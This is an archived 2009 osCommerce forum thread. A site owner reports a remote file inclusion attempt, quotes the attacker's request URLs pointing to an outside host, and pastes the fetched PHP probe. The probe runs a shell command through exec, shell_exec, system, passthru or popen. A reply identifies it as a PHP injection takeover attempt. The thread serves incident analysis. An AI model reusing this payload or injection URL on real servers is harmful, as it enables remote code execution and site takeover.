multimixer Posted July 2, 2009 Posted July 2, 2009 I found a "customer" being at this place of my site /catalog/?_SERVER[DOCUMENT_ROOT]=http://www.daftarwarisan.gov.my/img/ec.txt? From cpanel I see that he was also here /?_SERVER[DOCUMENT_ROOT]=http://www.daftarwarisan.gov.my/img/ec.txt? The content of this ec.txt file is: <?php echo "Mic22"; $cmd="id"; $eseguicmd=ex($cmd); echo $eseguicmd; function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } elseif(function_exists('system')){ @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')){ @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))){ $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); }} return $res; } exit; Thats not good for sure. But what does it mean exactly? What happened to me now? What am I supposed to do? My community profile | Template system for osCommerce - New: Responsive | Feedback channel
Nullachtfuffzehn Posted July 2, 2009 Posted July 2, 2009 It was an intrusion attempt by PHP injection to take over your webserver. An intrusion detection system could enhance the security of your website. As far as I know there is an add-on that provides basic protection against such attempts.
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.